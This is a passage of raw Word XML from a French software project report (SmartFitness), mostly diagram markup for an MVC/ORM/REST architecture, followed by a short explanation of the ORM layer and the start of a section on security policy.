          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Elle a pour rôle de délester le contrôleur de toute la gestion du traitement des requêtes SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFA8D2B" w14:textId="77777777" w:rsidR="00020402" w:rsidRDefault="007360F8" w:rsidP="003D7CDE">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251682816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5FC60BE2" wp14:editId="4BC2D2E3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2447925</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>243840</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="781050" cy="466725"/>
                <wp:effectExtent l="0" t="0" r="19050" b="28575"/>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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="5C7E8FC6" w14:textId="77777777" w:rsidR="007360F8" w:rsidRDefault="00E95CCC" w:rsidP="007360F8">
                            <w:pPr>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Logique métier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5FC60BE2" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Zone de texte 18" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:192.75pt;margin-top:19.2pt;width:61.5pt;height:36.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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5C7E8FC6" w14:textId="77777777" w:rsidR="007360F8" w:rsidRDefault="00E95CCC" w:rsidP="007360F8">
                      <w:pPr>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Logique métier</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0C213CFD" wp14:editId="722D6650">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3348355</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>237490</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="828675" cy="466725"/>
                <wp:effectExtent l="0" t="0" r="28575"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66725"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0C93497B" w14:textId="77777777" w:rsidR="00020402" w:rsidRDefault="000B4AC8" w:rsidP="00625919">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Contrôleur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C213CFD" id="Zone de texte 2" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:263.65pt;margin-top:18.7pt;width:65.25pt;height:3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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0C93497B" w14:textId="77777777" w:rsidR="00020402" w:rsidRDefault="000B4AC8" w:rsidP="00625919">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Contrôleur</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52BAF1F0" wp14:editId="68E06D29">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1510030</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>237490</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="781050" cy="466725"/>
                <wp:effectExtent l="0" t="0" r="19050"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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="25CFBA66" w14:textId="77777777" w:rsidR="00020402" w:rsidRDefault="000B4AC8" w:rsidP="000B4AC8">
                            <w:pPr>
                              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Modèle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2BAF1F0" id="Zone de texte 3" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:118.9pt;margin-top:18.7pt;width:61.5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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="25CFBA66" w14:textId="77777777" w:rsidR="00020402" w:rsidRDefault="000B4AC8" w:rsidP="000B4AC8">
                      <w:pPr>
                        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Modèle</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A129AA">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251666430" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="04C8AA18" wp14:editId="21321949">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>929005</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>280035</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="523875" cy="409575"/>
                <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21098"/>
                    <wp:lineTo x="21207" y="21098"/>
                    <wp:lineTo x="21207" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>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409575"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="71A56078" w14:textId="77777777" w:rsidR="00A129AA" w:rsidRDefault="00A129AA" w:rsidP="00A129AA">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>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8AA18" id="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:73.15pt;margin-top:22.05pt;width:41.25pt;height:32.25pt;z-index:25166643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NdJgIAACcEAAAOAAAAZHJzL2Uyb0RvYy54bWysU02P0zAQvSPxHyzfadJsS9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" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="71A56078" w14:textId="77777777" w:rsidR="00A129AA" w:rsidRDefault="00A129AA" w:rsidP="00A129AA">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>ORM</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000B4AC8">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251667455" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A00D2B3" wp14:editId="2C9FD3F4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>4243070</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>232410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="752475" cy="381000"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="20520"/>
                    <wp:lineTo x="21327" y="20520"/>
                    <wp:lineTo x="21327" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>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81000"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="7D22A3FF" w14:textId="77777777" w:rsidR="00BB5B43" w:rsidRDefault="000B4AC8" w:rsidP="00BB5B43">
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>Rest</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve">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0D2B3" id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;margin-left:334.1pt;margin-top:18.3pt;width:59.25pt;height:30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" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7D22A3FF" w14:textId="77777777" w:rsidR="00BB5B43" w:rsidRDefault="000B4AC8" w:rsidP="00BB5B43">
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Rest</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> API</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00625919">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0A92F097" wp14:editId="42248621">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4900930</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>241935</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1047750" cy="4667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725"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="06492360" w14:textId="77777777" w:rsidR="00020402" w:rsidRDefault="000B4AC8" w:rsidP="00625919">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>Vue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A92F097" id="_x0000_s1031" type="#_x0000_t202" style="position:absolute;margin-left:385.9pt;margin-top:19.05pt;width:82.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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="06492360" w14:textId="77777777" w:rsidR="00020402" w:rsidRDefault="000B4AC8" w:rsidP="00625919">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Vue</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00BB5B43">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0E3A7F73" wp14:editId="753821FC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1310005</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>90805</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3076575" cy="838200"/>
                <wp:effectExtent l="0" t="0" r="28575" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="5" name="Rectangle : coins arrondis 5"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3076575" cy="838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17E12A" id="Rectangle : coins arrondis 5" o:spid="_x0000_s1026" style="position:absolute;margin-left:103.15pt;margin-top:7.15pt;width:242.25pt;height:6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" filled="f" strokecolor="#1f4d78 [1604]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00BB5B43">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="057CBE21" wp14:editId="1D96BBF3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-4445</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>243205</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="876300" cy="466725"/>
                <wp:effectExtent l="0" t="0" r="19050" b="2857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6725"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="022B81E2" w14:textId="77777777" w:rsidR="00020402" w:rsidRDefault="00F90566" w:rsidP="00625919">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>DB</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="057CBE21" id="Zone de texte 4" o:spid="_x0000_s1032" type="#_x0000_t202" style="position:absolute;margin-left:-.35pt;margin-top:19.15pt;width:69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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="022B81E2" w14:textId="77777777" w:rsidR="00020402" w:rsidRDefault="00F90566" w:rsidP="00625919">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>DB</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="43068728" w14:textId="77777777" w:rsidR="00001FCB" w:rsidRDefault="00F90566" w:rsidP="00D54400">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251680768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3AB52974" wp14:editId="53040841">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>233680</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>194310</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="404495" cy="533400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20829"/>
                <wp:lineTo x="20345" y="20829"/>
                <wp:lineTo x="20345"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49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C75">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5CBD7988" wp14:editId="6BEC4107">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>5234305</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>222250</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="428625" cy="457200"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20700"/>
                <wp:lineTo x="21120" y="20700"/>
                <wp:lineTo x="21120"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6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919">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61879596" wp14:editId="29829900">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4224655</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>156209</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="666750" cy="45719"/>
                <wp:effectExtent l="19050" t="19050" r="38100" b="31115"/>
                <wp:wrapNone/>
                <wp:docPr id="9" name="Flèche : double flèche horizontale 9"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm flipV="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="66675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86835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9" o:spid="_x0000_s1026" type="#_x0000_t69" style="position:absolute;margin-left:332.65pt;margin-top:12.3pt;width:52.5pt;height:3.6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" adj="741" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00BB5B43">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="123451FF" wp14:editId="7C3A5190">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>909955</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>195580</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="581025" cy="45719"/>
                <wp:effectExtent l="19050" t="19050" r="47625" b="31115"/>
                <wp:wrapNone/>
                <wp:docPr id="7" name="Flèche : double flèche horizontale 7"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm flipV="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="581025"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B8D62" id="Flèche : double flèche horizontale 7" o:spid="_x0000_s1026" type="#_x0000_t69" style="position:absolute;margin-left:71.65pt;margin-top:15.4pt;width:45.75pt;height:3.6pt;flip:y;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" adj="850" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7BEFE2" w14:textId="77777777" w:rsidR="00020402" w:rsidRDefault="004D7C75">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="64580EC6" wp14:editId="213BBFBD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2585085</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>188595</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="542925" cy="490855"/>
            <wp:effectExtent l="0" t="0" r="9525" b="4445"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20957"/>
                <wp:lineTo x="21221" y="20957"/>
                <wp:lineTo x="2122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E8F95" w14:textId="77777777" w:rsidR="00020402" w:rsidRDefault="000B4AC8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C37682A" wp14:editId="44A3D711">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>1880870</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>125730</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2009775" cy="381000"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="20520"/>
                    <wp:lineTo x="21498" y="20520"/>
                    <wp:lineTo x="21498" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>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81000"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="760754CA" w14:textId="77777777" w:rsidR="00020402" w:rsidRDefault="00020402" w:rsidP="000204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7682A" id="_x0000_s1033" type="#_x0000_t202" style="position:absolute;margin-left:148.1pt;margin-top:9.9pt;width:158.25pt;height:30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" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="760754CA" w14:textId="77777777" w:rsidR="00020402" w:rsidRDefault="00020402" w:rsidP="00020402"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C74947" w14:textId="77777777" w:rsidR="00020402" w:rsidRDefault="00020402"/>
    <w:p w14:paraId="40531630" w14:textId="77777777" w:rsidR="0051668D" w:rsidRDefault="0051668D" w:rsidP="00FA3DA1"/>
    <w:p w14:paraId="4E8710C5" w14:textId="52D2C8B5" w:rsidR="00FA3DA1" w:rsidRDefault="00AF5AB1" w:rsidP="00FA3DA1">
      <w:r>
        <w:t>Précision : l</w:t>
      </w:r>
      <w:r w:rsidR="003A3C7A">
        <w:t xml:space="preserve">e concept d’un ORM (Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A3C7A">
        <w:t>Relationnal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003A3C7A">
        <w:t xml:space="preserve"> mapping) est d’introduire une couche d’abstraction de toute la partie SQL en connectant le modèle objet de l’application à un modèle relationnel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7F3A1D" w14:textId="77777777" w:rsidR="00A74150" w:rsidRDefault="00A74150" w:rsidP="00A74150">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:ind w:firstLine="705"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Dans un troisième temps il s’agit de mettre en place la politique de sécurité de l’application. Selon Wikipédia, la sécurité informatique vise à empêcher l’utilisation non-autorisée, le mauvais usage, la modification ou le détournement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>du système d’information.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE56651" w14:textId="77777777" w:rsidR="00A74150" w:rsidRDefault="00A74150" w:rsidP="00A74150">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:ind w:firstLine="705"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Pour le projet </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SmartFitness</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
